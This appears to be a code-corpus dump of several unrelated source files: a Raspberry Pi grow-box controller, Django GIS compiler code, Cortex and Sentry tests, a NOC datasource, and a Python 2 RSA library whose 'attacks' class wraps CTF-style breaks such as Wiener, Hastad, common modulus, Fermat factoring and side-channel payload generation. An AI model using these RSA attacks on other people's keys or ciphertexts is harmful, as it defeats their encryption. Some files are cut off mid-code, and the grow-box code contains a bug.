from gpiozero import CPUTemperature
from sensors import Sensor
import json as js
import RPi.GPIO as GPIO
GPIO.setmode(GPIO.BCM)
class Growbox():
actuators = []
Sensor()
cpu = CPUTemperature()
data_logger = Logger('data')
error_logger = Logger('error_growbox')
preferences_logger = Preferences()
preferences = preferences_logger.get_data()
log_interval = timedelta(minutes=preferences['log_interval'])
last_log = datetime.now()-log_interval
def __init__(self, pin, id):
self.pin = pin
self.id = id
self.state = False
GPIO.setup(self.pin, GPIO.OUT)
GPIO.output(self.pin, True)
Growbox.actuators.append(self)
def set_state(self, state=False):
self.state = state
print(f'{self.id} set to state {self.state} and GPIO to {not self.state}')
GPIO.output(self.pin, not self.state)
def toggle_state(self):
self.state = not self.set_state
@classmethod
def safe_preferences(cls):
print(cls.preferences)
cls.preferences_logger.write(cls.build_data())
@classmethod
def path_data(cls):
return cls.data_logger.get_path()
@staticmethod
def get_time():
return datetime.now()
@classmethod
def update_sensordata(cls):
cls.sensordata = Sensor.get_data()
# pins = [18, 23, 24, 17, 27, 22]
@classmethod
def init_actuators(cls):
print('init growbox')
Growbox.update_sensordata()
Lamp(24, 'lamp_g', 18 , growth_phase='g')
Lamp(23, 'lamp_f', 12, growth_phase='f')
Pot(22, 'pot1', 27, 'soil1')
Pot(17, 'pot2', 27, 'soil2')
Fan(18, 'fan')
cls.update_sensordata()
Lamp.update_lamps()
Pot.update_pots()
Fan.update_fans()
@classmethod
def log_data(cls):
if datetime.now() >= cls.last_log + cls.log_interval:
print("loging data")
cls.last_log = datetime.now()
cls.data_logger.write(js.dumps(cls.build_data()))
@classmethod
def main_loop(cls):
print('starting growbox')
while True:
try:
cls.update_sensordata()
Lamp.update_lamps()
Pot.update_pots()
Fan.update_fans()
cls.log_data()
except Exception as e:
cls.error_logger.write(repr(e))
raise e
@classmethod
def build_data(cls):
_data = {}
_data['time'] = datetime.now().strftime("%H:%M:%S")
_data['date'] = datetime.now().strftime("%m/%d/%Y %H:%M:%S")
_data['cpu_temp'] = cls.cpu.temperature
_data = _data | Growbox.sensordata
_data = _data | Lamp.get_data()
_data = _data | Pot.get_data()
_data = _data | Fan.get_data()
return _data
## print(js.dumps(_data, indent=4))
#exit()
class Lamp(Growbox):
lamps = []
phase = Growbox.preferences['lamp_phase']
lamp_state = False
on_time = timedelta(hours=int(Growbox.preferences['lamp_ontime'].split(':')[0]),
minutes=int(Growbox.preferences['lamp_ontime'].split(':')[1]))
def __init__(self, pin, id, duration, growth_phase='g'):
super().__init__(pin, id)
self.duration = duration
self.duration = timedelta(hours=duration) # time when lmap turns on
self.growth_phase = growth_phase
Lamp.lamps.append(self)
@classmethod
def get_data(cls):
_data = {}
_data['lamp_phase'] = cls.phase
_data['lamp_state'] = cls.lamp_state
_ontime = str(cls.on_time)
if len(_ontime) < 8:
_ontime = '0' + _ontime
_ontime = _ontime[:_ontime.rfind(':')]
_data['lamp_ontime']= _ontime
for lamp in cls.lamps:
_data[lamp.id+ '_state']=lamp.state
_data[lamp.id+ '_duration']=lamp.duration.seconds//3600
_data[lamp.id+ '_phase']=lamp.growth_phase
pass
return _data
def update(self):
_time =Growbox.get_time()
day = datetime.now().replace(hour=0, minute=0, second=0, microsecond=0)
#turn off if not right phase
if Lamp.phase != self.growth_phase and self.state:
self.set_state(False)
elif Lamp.phase == self.growth_phase:
# turning off
if self.state:
if _time > Lamp.on_time + self.duration + day or _time < Lamp.on_time + day:
self.set_state(False)
Lamp.lamp_state = False
# turn on
elif not self.state and _time > Lamp.on_time + day and _time < Lamp.on_time + day + self.duration:
self.set_state(True)
Lamp.lamp_state = True
@classmethod
def set_phase(cls, phase):
cls.phase = phase
@classmethod
def update_lamps(cls):
for lamp in cls.lamps:
lamp.update()
@classmethod
def set_phase(cls, phase):
cls.phase = phase # 'g' or ''f'
@classmethod
def set_starttime(cls, starttime):
_dt = datetime.strptime(starttime, "%H:%M")
cls.on_time = timedelta(hours=_dt.hour, minutes=_dt.minute)
class Pot(Growbox):
pin_pump = 0
state_pump= False
pots = []
irrigation_interval = Growbox.preferences['irrigation_interval'] # hours
irrigation_duration = Growbox.preferences['irrigation_duration'] # in seconds
soil_moist_hyst_min = Growbox.preferences['soil_moist_hyst_min']
soil_moist_hyst_max = Growbox.preferences['soil_moist_hyst_max']
def __init__(self, pin, state, pin_pump, index_soil):
super().__init__(pin, state)
Pot.pin_pump=pin_pump
Pot.pots.append(self)
self. index_soil = index_soil # index for dict form sensordate (available: "soil1", "soil2", "siol3")
self.flag_dry = False
self.last_irrigation = datetime.now()-timedelta(hours=Pot.irrigation_interval)+ timedelta(seconds=15)
GPIO.setup(pin_pump, GPIO.OUT)
GPIO.output(self.pin, True)
@classmethod
def get_data(cls):
_data = {}
_data['state_pump'] = cls.state_pump
_data['irrigation_interval'] = cls.irrigation_interval
_data['irrigation_duration'] = cls.irrigation_duration
_data['soil_moist_hyst_min'] = cls.soil_moist_hyst_min
_data['soil_moist_hyst_max'] = cls.soil_moist_hyst_max
for pot in cls.pots:
_data[pot.id + '_state'] = pot.state
_data[pot.id + '_dry'] = pot.flag_dry
_data[pot.id + '_soil_moist'] = pot.soil_moist
return _data
def update(self):
#update soil moist
self.soil_moist = Growbox.sensordata[self.index_soil]
# raise flag if dry
if self.soil_moist <= Pot.soil_moist_hyst_min:
self.flag_dry = True
elif self.soil_moist >= Pot.soil_moist_hyst_max:
self.flag_dry = False
# call pummp and valve if pump state is false
if not Pot.state_pump and self.flag_dry and datetime.now() - self.last_irrigation > timedelta(hours=Pot.irrigation_interval):
Pot.start_time = datetime.now()
Pot.state_pump = True
GPIO.output(Pot.pin_pump, False) #inverted relais
Pot.pumping_pot_id = self.id
self.last_irrigation = datetime.now()
self.set_state(True)
elif Pot.state_pump and Pot.pumping_pot_id == self.id and datetime.now() - Pot.start_time > timedelta(seconds=self.irrigation_duration):
Pot.state_pump = False
GPIO.output(Pot.pin_pump, True) #inverted relais
self.set_state(False)
Pot.pumping_pot_id = ''
@classmethod
def update_pots(cls):
for pot in cls.pots:
pot.update()
@classmethod
def set_irrigation_interval(cls, irrigation_interval): # in hours
cls.irrigation_interval = int(irrigation_interval)
@classmethod
def set_irrigation_duration(cls, irrigation_duration): # in seconds
cls.irrigation_duration = int(irrigation_duration)
@classmethod
def set_soil_moist_hyst_min(cls, soil_moist_hyst_min):
cls.soil_moist_hyst_min = int(soil_moist_hyst_min)
@classmethod
def set_soil_moist_hyst_max(cls, soil_moist_hyst_max):
cls.soil_moist_hyst_max = int(soil_moist_hyst_max)
class Fan(Growbox):
fans=[]
temp_hyst_min = Growbox.preferences['temp_hyst_min']
temp_hyst_max = Growbox.preferences['temp_hyst_max']
hum_hyst_min = Growbox.preferences['hum_hyst_min']
hum_hyst_max = Growbox.preferences['hum_hyst_max']
fans_state = False
def __init__(self, pin, id):
super().__init__(pin, id)
Fan.fans.append(self)
@classmethod
def get_data(cls):
_data = {}
_data['temp_hyst_min'] = cls.temp_hyst_min
_data['temp_hyst_max'] = cls.temp_hyst_max
_data['hum_hyst_min'] = cls.hum_hyst_min
_data['hum_hyst_max'] = cls.hum_hyst_max
_data['state'] = cls.fans_state
for fan in cls.fans:
_data[fan.id + '_state'] = fan.state
return _data
def update(self):
temp = int(Growbox.sensordata['temp'])
hum = int(Growbox.sensordata['hum'])
if not self.state:
if temp >= Fan.temp_hyst_max or hum >= Fan.hum_hyst_max:
self.set_state(True)
Fan.fans_state = True
# print(f"turning on {self.id}")
elif self.state and Fan.temp_hyst_min > temp and Fan.hum_hyst_min > hum:
self.set_state(False)
Fan.fans_state = False
# print(f"turning on {self.id}")
@classmethod
def update_fans(cls):
for fan in cls.fans:
fan.update()
@classmethod
def set_temp_hyst_min(cls, temp_hyst_min):
cls.temp_hyst_min = int(temp_hyst_min)
@classmethod
def set_temp_hyst_max(cls, temp_hyst_max):
cls.temp_hyst_max = int(temp_hyst_max)
@classmethod
def set_hum_hyst_min(cls, hum_hyst_min):
cls.hum_hyst_min = int(hum_hyst_min)
@classmethod
def set_hum_hyst_max(cls, hum_hyst_max):
cls.hum_hyst_max = int(hum_hyst_max)
if __name__=='__main__':
Growbox.init_actuators()
Growbox.safe_preferences()
Growbox.main_loop()
| 31.321127 | 145 | 0.583596 |
0f4c1d4399d64377b2d90f689aecf24be86501fd | 12,877 | py | Python | django/contrib/gis/db/models/sql/compiler.py | egenerat/gae-django | f12379483cf3917ed3cb46ca5ff0b94daf89fc50 | [
"MIT"
] | 3 | 2016-07-08T23:49:32.000Z | 2018-04-15T22:55:01.000Z | django/contrib/gis/db/models/sql/compiler.py | egenerat/gae-django | f12379483cf3917ed3cb46ca5ff0b94daf89fc50 | [
"MIT"
] | 27 | 2017-02-05T15:57:04.000Z | 2018-04-15T22:57:26.000Z | django/contrib/gis/db/models/sql/compiler.py | egenerat/gae-django | f12379483cf3917ed3cb46ca5ff0b94daf89fc50 | [
"MIT"
] | null | null | null | from itertools import izip
from django.db.backends.util import truncate_name
from django.db.models.sql import compiler
from django.db.models.sql.constants import TABLE_NAME
from django.db.models.sql.query import get_proxied_model
SQLCompiler = compiler.SQLCompiler
class GeoSQLCompiler(compiler.SQLCompiler):
def get_columns(self, with_aliases=False):
"""
Return the list of columns to use in the select statement. If no
columns have been specified, returns all columns relating to fields in
the model.
If 'with_aliases' is true, any column names that are duplicated
(without the table names) are given unique aliases. This is needed in
some cases to avoid ambiguitity with nested queries.
This routine is overridden from Query to handle customized selection of
geometry columns.
"""
qn = self.quote_name_unless_alias
qn2 = self.connection.ops.quote_name
result = ['(%s) AS %s' % (self.get_extra_select_format(alias) % col[0], qn2(alias))
for alias, col in self.query.extra_select.iteritems()]
aliases = set(self.query.extra_select.keys())
if with_aliases:
col_aliases = aliases.copy()
else:
col_aliases = set()
if self.query.select:
only_load = self.deferred_to_columns()
# This loop customized for GeoQuery.
for col, field in izip(self.query.select, self.query.select_fields):
if isinstance(col, (list, tuple)):
alias, column = col
table = self.query.alias_map[alias][TABLE_NAME]
if table in only_load and col not in only_load[table]:
continue
r = self.get_field_select(field, alias, column)
if with_aliases:
if col[1] in col_aliases:
c_alias = 'Col%d' % len(col_aliases)
result.append('%s AS %s' % (r, c_alias))
aliases.add(c_alias)
col_aliases.add(c_alias)
else:
result.append('%s AS %s' % (r, qn2(col[1])))
aliases.add(r)
col_aliases.add(col[1])
else:
result.append(r)
aliases.add(r)
col_aliases.add(col[1])
else:
result.append(col.as_sql(qn, self.connection))
if hasattr(col, 'alias'):
aliases.add(col.alias)
col_aliases.add(col.alias)
elif self.query.default_cols:
cols, new_aliases = self.get_default_columns(with_aliases,
col_aliases)
result.extend(cols)
aliases.update(new_aliases)
max_name_length = self.connection.ops.max_name_length()
result.extend([
'%s%s' % (
self.get_extra_select_format(alias) % aggregate.as_sql(qn, self.connection),
alias is not None
and ' AS %s' % qn(truncate_name(alias, max_name_length))
or ''
)
for alias, aggregate in self.query.aggregate_select.items()
])
# This loop customized for GeoQuery.
for (table, col), field in izip(self.query.related_select_cols, self.query.related_select_fields):
r = self.get_field_select(field, table, col)
if with_aliases and col in col_aliases:
c_alias = 'Col%d' % len(col_aliases)
result.append('%s AS %s' % (r, c_alias))
aliases.add(c_alias)
col_aliases.add(c_alias)
else:
result.append(r)
aliases.add(r)
col_aliases.add(col)
self._select_aliases = aliases
return result
def get_default_columns(self, with_aliases=False, col_aliases=None,
start_alias=None, opts=None, as_pairs=False, local_only=False):
"""
Computes the default columns for selecting every field in the base
model. Will sometimes be called to pull in related models (e.g. via
select_related), in which case "opts" and "start_alias" will be given
to provide a starting point for the traversal.
Returns a list of strings, quoted appropriately for use in SQL
directly, as well as a set of aliases used in the select statement (if
'as_pairs' is True, returns a list of (alias, col_name) pairs instead
of strings as the first component and None as the second component).
This routine is overridden from Query to handle customized selection of
geometry columns.
"""
result = []
if opts is None:
opts = self.query.model._meta
aliases = set()
only_load = self.deferred_to_columns()
# Skip all proxy to the root proxied model
proxied_model = get_proxied_model(opts)
if start_alias:
seen = {None: start_alias}
for field, model in opts.get_fields_with_model():
if local_only and model is not None:
continue
if start_alias:
try:
alias = seen[model]
except KeyError:
if model is proxied_model:
alias = start_alias
else:
link_field = opts.get_ancestor_link(model)
alias = self.query.join((start_alias, model._meta.db_table,
link_field.column, model._meta.pk.column))
seen[model] = alias
else:
# If we're starting from the base model of the queryset, the
# aliases will have already been set up in pre_sql_setup(), so
# we can save time here.
alias = self.query.included_inherited_models[model]
table = self.query.alias_map[alias][TABLE_NAME]
if table in only_load and field.column not in only_load[table]:
continue
if as_pairs:
result.append((alias, field.column))
aliases.add(alias)
continue
# This part of the function is customized for GeoQuery. We
# see if there was any custom selection specified in the
# dictionary, and set up the selection format appropriately.
field_sel = self.get_field_select(field, alias)
if with_aliases and field.column in col_aliases:
c_alias = 'Col%d' % len(col_aliases)
result.append('%s AS %s' % (field_sel, c_alias))
col_aliases.add(c_alias)
aliases.add(c_alias)
else:
r = field_sel
result.append(r)
aliases.add(r)
if with_aliases:
col_aliases.add(field.column)
return result, aliases
def resolve_columns(self, row, fields=()):
"""
This routine is necessary so that distances and geometries returned
from extra selection SQL get resolved appropriately into Python
objects.
"""
values = []
aliases = self.query.extra_select.keys()
if self.query.aggregates:
# If we have an aggregate annotation, must extend the aliases
# so their corresponding row values are included.
aliases.extend([None for i in xrange(len(self.query.aggregates))])
# Have to set a starting row number offset that is used for
# determining the correct starting row index -- needed for
# doing pagination with Oracle.
rn_offset = 0
if self.connection.ops.oracle:
if self.query.high_mark is not None or self.query.low_mark: rn_offset = 1
index_start = rn_offset + len(aliases)
# Converting any extra selection values (e.g., geometries and
# distance objects added by GeoQuerySet methods).
values = [self.query.convert_values(v,
self.query.extra_select_fields.get(a, None),
self.connection)
for v, a in izip(row[rn_offset:index_start], aliases)]
if self.connection.ops.oracle or getattr(self.query, 'geo_values', False):
# We resolve the rest of the columns if we're on Oracle or if
# the `geo_values` attribute is defined.
for value, field in map(None, row[index_start:], fields):
values.append(self.query.convert_values(value, field, connection=self.connection))
else:
values.extend(row[index_start:])
return tuple(values)
#### Routines unique to GeoQuery ####
def get_extra_select_format(self, alias):
sel_fmt = '%s'
if alias in self.query.custom_select:
sel_fmt = sel_fmt % self.query.custom_select[alias]
return sel_fmt
def get_field_select(self, field, alias=None, column=None):
"""
Returns the SELECT SQL string for the given field. Figures out
if any custom selection SQL is needed for the column The `alias`
keyword may be used to manually specify the database table where
the column exists, if not in the model associated with this
`GeoQuery`. Similarly, `column` may be used to specify the exact
column name, rather than using the `column` attribute on `field`.
"""
sel_fmt = self.get_select_format(field)
if field in self.query.custom_select:
field_sel = sel_fmt % self.query.custom_select[field]
else:
field_sel = sel_fmt % self._field_column(field, alias, column)
return field_sel
def get_select_format(self, fld):
"""
Returns the selection format string, depending on the requirements
of the spatial backend. For example, Oracle and MySQL require custom
selection formats in order to retrieve geometries in OGC WKT. For all
other fields a simple '%s' format string is returned.
"""
if self.connection.ops.select and hasattr(fld, 'geom_type'):
# This allows operations to be done on fields in the SELECT,
# overriding their values -- used by the Oracle and MySQL
# spatial backends to get database values as WKT, and by the
# `transform` method.
sel_fmt = self.connection.ops.select
# Because WKT doesn't contain spatial reference information,
# the SRID is prefixed to the returned WKT to ensure that the
# transformed geometries have an SRID different than that of the
# field -- this is only used by `transform` for Oracle and
# SpatiaLite backends.
if self.query.transformed_srid and ( self.connection.ops.oracle or
self.connection.ops.spatialite ):
sel_fmt = "'SRID=%d;'||%s" % (self.query.transformed_srid, sel_fmt)
else:
sel_fmt = '%s'
return sel_fmt
# Private API utilities, subject to change.
def _field_column(self, field, table_alias=None, column=None):
"""
Helper function that returns the database column for the given field.
The table and column are returned (quoted) in the proper format, e.g.,
`"geoapp_city"."point"`. If `table_alias` is not specified, the
database table associated with the model of this `GeoQuery` will be
used. If `column` is specified, it will be used instead of the value
in `field.column`.
"""
if table_alias is None: table_alias = self.query.model._meta.db_table
return "%s.%s" % (self.quote_name_unless_alias(table_alias),
self.connection.ops.quote_name(column or field.column))
class SQLInsertCompiler(compiler.SQLInsertCompiler, GeoSQLCompiler):
pass
class SQLDeleteCompiler(compiler.SQLDeleteCompiler, GeoSQLCompiler):
pass
class SQLUpdateCompiler(compiler.SQLUpdateCompiler, GeoSQLCompiler):
pass
class SQLAggregateCompiler(compiler.SQLAggregateCompiler, GeoSQLCompiler):
pass
class SQLDateCompiler(compiler.SQLDateCompiler, GeoSQLCompiler):
pass
| 46.154122 | 107 | 0.578318 |
483f2072e600e60a0b7b669a6aa27e9f9fa59e34 | 4,010 | py | Python | CryptoLib/RSA/RSA.py | J-SB/ModernCryptoLib | 7f3532933933a4c558d5ba25bdbb8e9cb8d06819 | [
"MIT"
] | 12 | 2018-02-16T21:37:00.000Z | 2022-02-23T03:19:57.000Z | CryptoLib/RSA/RSA.py | J-SB/ModernCryptoLib | 7f3532933933a4c558d5ba25bdbb8e9cb8d06819 | [
"MIT"
] | 1 | 2020-10-08T14:11:16.000Z | 2020-10-08T14:11:16.000Z | CryptoLib/RSA/RSA.py | J-SB/ModernCryptoLib | 7f3532933933a4c558d5ba25bdbb8e9cb8d06819 | [
"MIT"
] | 5 | 2018-02-16T21:37:02.000Z | 2020-10-08T05:08:24.000Z | class utilities:
@staticmethod
def egcd(a,b):
from RSA_Attacks.utilities import egcd
return egcd(a,b)
@staticmethod
def modinv(a,m):
from RSA_Attacks.utilities import modinv
return modinv(a,m)
@staticmethod
def mulinv(a,b):
from RSA_Attacks.utilities import mulinv
return mulinv(a,b)
@staticmethod
def powinv(x,n):
from RSA_Attacks.utilities import powinv
return powinv(x,n)
@staticmethod
def rational_to_contfrac (x, y):
from RSA_Attacks.utilities import rational_to_contfrac
return rational_to_contfrac (x, y)
@staticmethod
def convergents_from_contfrac(frac):
from RSA_Attacks.utilities import convergents_from_contfrac
return convergents_from_contfrac
@staticmethod
def contfrac_to_rational (frac):
from RSA_Attacks.utilities import contfrac_to_rational
return contfrac_to_rational (frac)
@staticmethod
def is_perfect_square(n):
from RSA_Attacks.utilities import is_perfect_square
return is_perfect_square(n)
@staticmethod
def isqrt(n):
from RSA_Attacks.utilities import isqrt
return isqrt(n)
class attacks:
@staticmethod
def Fermat(n,limit=9999):
from RSA_Attacks.fermet import fermat
return fermat(n,limit)
@staticmethod
def MultiPrime(primes_array,n,e,c):
from RSA_Attacks.multiPrime import multiPrime
return multiPrime(primes_array,n,e,c)
@staticmethod
def Common_modulus(chipher_text_1, chipher_text_2, e1, e2, n):
from RSA_Attacks.common_modulus import common_modulus
return common_modulus(chipher_text_1, chipher_text_2, e1, e2, n)
@staticmethod
def Chinese_remainder_theorem(p,q,dp,dq,chipher_text):
from RSA_Attacks.chinese_remainder_theorem import chinese_remainder_theorem
return chinese_remainder_theorem(p,q,dp,dq,chipher_text)
@staticmethod
def Wiener(n,e):
from RSA_Attacks.wiener import wiener
return wiener(n,e)
@staticmethod
def Hasted(n1,n2,n3,chipher_text_1,chipher_text_2,chipher_text_3,e):
from RSA_Attacks.hasted import hasted
return hasted(n1,n2,n3,chipher_text_1,chipher_text_2,chipher_text_3,e)
@staticmethod
def Gen_sideChannel_payload(n,c,e):
from RSA_Attacks.side_channel import gen_sideChannel_payload
return gen_sideChannel_payload(n,c,e)
@staticmethod
def Reverse_sideChannel_payload(payload):
from RSA_Attacks.side_channel import reverse_sideChannel_payload
return reverse_sideChannel_payload(payload)
@staticmethod
def Factordb(n):
from RSA_Attacks.factordb import FactorDB
f = FactorDB(n)
f.connect()
return f.get_factor_list()
class calculate:
@staticmethod
def phi(p,q):
return (p - 1) * (q -1)
@staticmethod
def d(p,q,e):
from RSA_Attacks.utilities import modinv
return modinv(e,calculate.phi(p,q))
class convert:
@staticmethod
def hex_to_decimal(data_bytes):
return long(data_bytes,16)
@staticmethod
def base64_to_decimal(b64_string):
from base64 import b64decode
return convert.hex_to_decimal( b64decode(b64_string) )
@staticmethod
def decimal_to_text(number):
number = format(int(number), 'x')
return str(number).decode("hex")
def KeyParser(path):
from Crypto.PublicKey import RSA
return RSA.importKey(open(path, "r").read())
class export:
@staticmethod
def public_key(n,e):
from Crypto.PublicKey import RSA
print RSA.construct((long(n), long(e))).exportKey()
@staticmethod
def private_key(n,e,d,p=None,q=None):
from Crypto.PublicKey import RSA
if q != None and p != None:
return RSA.construct((long(n), long(e) ,long(d) ,long(p),long(q))).exportKey()
else:
return RSA.construct((long(n), long(e) ,long(d))).exportKey()
| 32.08 | 91 | 0.685287 |
ab4a74e36c7925b14a45caa6f6fe4bcd7664a339 | 3,236 | py | Python | test/IECoreScene/SharedSceneInterfacesTest.py | ericmehl/cortex | 054839cc709ce153d1bcaaefe7f340ebe641ec82 | [
"BSD-3-Clause"
] | 386 | 2015-01-02T11:10:43.000Z | 2022-03-10T15:12:20.000Z | test/IECoreScene/SharedSceneInterfacesTest.py | ericmehl/cortex | 054839cc709ce153d1bcaaefe7f340ebe641ec82 | [
"BSD-3-Clause"
] | 484 | 2015-01-09T18:28:06.000Z | 2022-03-31T16:02:04.000Z | test/IECoreScene/SharedSceneInterfacesTest.py | ericmehl/cortex | 054839cc709ce153d1bcaaefe7f340ebe641ec82 | [
"BSD-3-Clause"
] | 99 | 2015-01-28T23:18:04.000Z | 2022-03-27T00:59:39.000Z | ##########################################################################
#
# Copyright (c) 2019, Image Engine Design Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above
# copyright notice, this list of conditions and the following
# disclaimer.
#
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided with
# the distribution.
#
# * Neither the name of John Haddon nor the names of
# any other contributors to this software may be used to endorse or
# promote products derived from this software without specific prior
# written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
##########################################################################
import unittest
import functools
import os
import IECoreScene
class SharedSceneInterfacesTest( unittest.TestCase ) :
def setUp( self ) :
maxScenes = IECoreScene.SharedSceneInterfaces.getMaxScenes()
self.addCleanup( functools.partial( IECoreScene.SharedSceneInterfaces.setMaxScenes ), maxScenes )
def testLimits( self ) :
IECoreScene.SharedSceneInterfaces.clear()
self.assertEqual( IECoreScene.SharedSceneInterfaces.numScenes(), 0 )
# Get more files than there is room for in the cache.
files = [
os.path.join( "test", "IECore", "data", "sccFiles", "animatedSpheres.scc" ),
os.path.join( "test", "IECore", "data", "sccFiles", "attributeAtRoot.scc" ),
os.path.join( "test", "IECore", "data", "sccFiles", "cube_v6.scc" ),
]
IECoreScene.SharedSceneInterfaces.setMaxScenes( len( files ) - 1 )
scenes = set()
for f in files :
scenes.add( IECoreScene.SharedSceneInterfaces.get( f ) )
# Check that the cache limit wasn't exceeded.
self.assertEqual( len( scenes ), len( files ) )
self.assertEqual( IECoreScene.SharedSceneInterfaces.numScenes(), IECoreScene.SharedSceneInterfaces.getMaxScenes() )
# Get all files again. This should result in being given at
# least one new interface, due to cache evictions.
for f in files :
scenes.add( IECoreScene.SharedSceneInterfaces.get( f ) )
self.assertGreater( len( scenes ), len( files ) )
if __name__ == "__main__":
unittest.main()
| 38.52381 | 117 | 0.699629 |
8fdc11da2ffbfc6a5379bebb23e4079215634750 | 839 | py | Python | services/datasource/datasources/ch_workflow.py | xUndero/noc | 9fb34627721149fcf7064860bd63887e38849131 | [
"BSD-3-Clause"
] | 1 | 2019-09-20T09:36:48.000Z | 2019-09-20T09:36:48.000Z | services/datasource/datasources/ch_workflow.py | ewwwcha/noc | aba08dc328296bb0e8e181c2ac9a766e1ec2a0bb | [
"BSD-3-Clause"
] | null | null | null | services/datasource/datasources/ch_workflow.py | ewwwcha/noc | aba08dc328296bb0e8e181c2ac9a766e1ec2a0bb | [
"BSD-3-Clause"
] | null | null | null | # -*- coding: utf-8 -*-
# ----------------------------------------------------------------------
# CHWorkflow datasource
# ----------------------------------------------------------------------
# Copyright (C) 2007-2018 The NOC Project
# See LICENSE for details
# ----------------------------------------------------------------------
# Python modules
from __future__ import absolute_import
from pymongo import ReadPreference
# NOC modules
from .base import BaseDataSource
from noc.wf.models.workflow import Workflow
class CHWorkflowDataSource(BaseDataSource):
name = "ch_workflow"
def extract(self):
for a in (
Workflow.objects.filter(read_preference=ReadPreference.SECONDARY_PREFERRED)
.all()
.order_by("id")
):
yield (a.bi_id, a.id, a.name, int(a.is_active))
| 29.964286 | 87 | 0.504172 |
c832e2d2d4d58c651fcdef05e8a75f935d05929c | 23,186 | py | Python | tests/sentry/plugins/mail/tests.py | practo/sentry | 82f530970ce205696469fa702246396acfd947a1 | [
"BSD-3-Clause"
] | null | null | null | tests/sentry/plugins/mail/tests.py | practo/sentry | 82f530970ce205696469fa702246396acfd947a1 | [
"BSD-3-Clause"
] | 1 | 2019-03-13T06:05:24.000Z | 2019-03-13T06:05:24.000Z | tests/sentry/plugins/mail/tests.py | practo/sentry | 82f530970ce205696469fa702246396acfd947a1 | [
"BSD-3-Clause"
] | null | null | null | # -*- coding: utf-8 -*-
from __future__ import absolute_import
from datetime import datetime
import mock
import pytz
import six
from django.contrib.auth.models import AnonymousUser
from django.core import mail
from django.utils import timezone
from exam import fixture
from mock import Mock
from sentry.api.serializers import (
serialize,
UserReportWithGroupSerializer,
)
from sentry.digests.notifications import build_digest, event_to_record
from sentry.interfaces.stacktrace import Stacktrace
from sentry.models import (
Activity, Event, Group, GroupSubscription, OrganizationMember, OrganizationMemberTeam,
ProjectOwnership, Rule, UserOption, UserReport
)
from sentry.ownership.grammar import Owner, Matcher, dump_schema
from sentry.plugins import Notification
from sentry.plugins.sentry_mail.activity.base import ActivityEmail
from sentry.plugins.sentry_mail.models import MailPlugin
from sentry.testutils import TestCase
from sentry.utils.email import MessageBuilder
from sentry.event_manager import EventManager
class MailPluginTest(TestCase):
@fixture
def plugin(self):
return MailPlugin()
@mock.patch(
'sentry.models.ProjectOption.objects.get_value', Mock(side_effect=lambda p, k, d: d)
)
@mock.patch(
'sentry.plugins.sentry_mail.models.MailPlugin.get_sendable_users', Mock(return_value=[])
)
def test_should_notify_no_sendable_users(self):
assert not self.plugin.should_notify(group=Mock(), event=Mock())
def test_simple_notification(self):
group = self.create_group(message='Hello world')
event = self.create_event(group=group, message='Hello world', tags={'level': 'error'})
rule = Rule.objects.create(project=self.project, label='my rule')
notification = Notification(event=event, rule=rule)
with self.options({'system.url-prefix': 'http://example.com'}), self.tasks():
self.plugin.notify(notification)
msg = mail.outbox[0]
assert msg.subject == '[Sentry] BAR-1 - Hello world'
assert 'my rule' in msg.alternatives[0][0]
@mock.patch('sentry.plugins.sentry_mail.models.MailPlugin._send_mail')
def test_notify_users_renders_interfaces_with_utf8(self, _send_mail):
group = Group(
id=2,
first_seen=timezone.now(),
last_seen=timezone.now(),
project=self.project,
)
stacktrace = Mock(spec=Stacktrace)
stacktrace.to_email_html.return_value = u'רונית מגן'
stacktrace.get_title.return_value = 'Stacktrace'
event = Event()
event.group = group
event.project = self.project
event.message = 'hello world'
event.interfaces = {'stacktrace': stacktrace}
notification = Notification(event=event)
with self.options({'system.url-prefix': 'http://example.com'}):
self.plugin.notify(notification)
stacktrace.get_title.assert_called_once_with()
stacktrace.to_email_html.assert_called_once_with(event)
@mock.patch('sentry.plugins.sentry_mail.models.MailPlugin._send_mail')
def test_notify_users_renders_interfaces_with_utf8_fix_issue_422(self, _send_mail):
group = Group(
id=2,
first_seen=timezone.now(),
last_seen=timezone.now(),
project=self.project,
)
stacktrace = Mock(spec=Stacktrace)
stacktrace.to_email_html.return_value = u'רונית מגן'
stacktrace.get_title.return_value = 'Stacktrace'
event = Event()
event.group = group
event.project = self.project
event.message = 'Soubor ji\xc5\xbe existuje'
event.interfaces = {'stacktrace': stacktrace}
notification = Notification(event=event)
with self.options({'system.url-prefix': 'http://example.com'}):
self.plugin.notify(notification)
stacktrace.get_title.assert_called_once_with()
stacktrace.to_email_html.assert_called_once_with(event)
@mock.patch('sentry.plugins.sentry_mail.models.MailPlugin._send_mail')
def test_notify_users_does_email(self, _send_mail):
event_manager = EventManager({
'message': 'hello world',
'level': 'error',
})
event_manager.normalize()
event_data = event_manager.get_data()
event_type = event_manager.get_event_type()
event_data['type'] = event_type.key
event_data['metadata'] = event_type.get_metadata(event_data)
group = Group(
id=2,
first_seen=timezone.now(),
last_seen=timezone.now(),
project=self.project,
message=event_manager.get_search_message(),
logger='root',
short_id=2,
data={
'type': event_type.key,
'metadata': event_type.get_metadata(event_data),
}
)
event = Event(
group=group,
message=group.message,
project=self.project,
datetime=group.last_seen,
data=event_data
)
notification = Notification(event=event)
with self.options({'system.url-prefix': 'http://example.com'}):
self.plugin.notify(notification)
assert _send_mail.call_count is 1
args, kwargs = _send_mail.call_args
